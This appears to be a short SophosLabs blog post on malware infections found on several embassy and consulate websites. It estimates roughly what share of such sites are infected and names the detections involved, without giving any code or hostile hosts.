YME&C: Yet More Embassies and Consulates

Previously, SophosLabs has spoken about Embassy and Consulate websites being infected:

Over the past few weeks SophosLabs has seen three more Embassy/Consulate sites join this list:

  • Pakistan Consulate in Houston, Texas
  • Embassy Republic of Iraq in Tehran, Iran
  • Embassy Republic of Sudan in Tehran, Iran

Are embassies being targeted?

No. They are just a microcosm of the Internet

There are ~200 countries in the world and each of those has ~1 Embassy/Consulate/High Commission in each of the other countries.

So that makes 200×200 = 40 000 websites

7/ 40 000 = 0.0175%

The above rough workings suggests that the percentage of infected websites is approximately 0.02%.

What malware is on these sites?

Mal/Iframe-F is the culprit for the Pakistani and Sudanese sites and Mal/ObfJS-BI for the Iraqi site.

The Mal/ObfJS-BI redirects to an iframe referencing an IP address registered in St. Petersburg, Russia. The Mal/Iframe-F reference two distinct domains one a .CN and the other a .BIZ (registered in Russia).